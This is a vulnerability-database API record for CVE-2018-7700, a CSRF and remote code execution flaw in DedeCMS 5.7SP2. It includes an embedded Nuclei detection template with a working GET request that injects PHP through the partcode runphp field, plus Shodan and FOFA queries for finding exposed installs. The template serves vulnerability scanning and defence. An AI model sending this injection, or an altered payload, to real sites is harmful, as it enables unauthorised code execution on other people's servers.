{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-7700/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-7700/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-7700/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-7700/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-7700/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-7700"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-7700"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.74118,
      "kev": false,
      "percentile": 0.99463
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-7700.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2018-7700\n\ninfo:\n  name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution\n  author: pikpikcu\n  severity: high\n  description: |\n    DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.\n  impact: |\n    Successful exploitation of these vulnerabilities can lead to unauthorized actions performed on behalf of the user and execution of arbitrary code.\n  remediation: |\n    Apply the latest security patches and update to a newer version of DedeCMS.\n  reference:\n    - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-7700\n    - https://github.com/0ps/pocassistdb\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2018-7700\n    cwe-id: CWE-352\n    epss-score: 0.74118\n    epss-percentile: 0.99463\n    cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: dedecms\n    product: dedecms\n    shodan-query:\n      - http.html:\"dedecms\"\n      - cpe:\"cpe:2.3:a:dedecms:dedecms\"\n    fofa-query:\n      - body=\"dedecms\"\n      - app=\"dedecms\"\n  tags: cve,cve2018,dedecms,rce,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"4cc32a3a81d2bb37271934a48ce4468a\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402206aad3452dd4752ce01ed38337799303c7766524847976413b2f13fb3376ed0ea02200536a36e8ed9b1227db99ed74e1bc060390fa124d2a67db4d01d8fa77f5fb69b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-7700"
}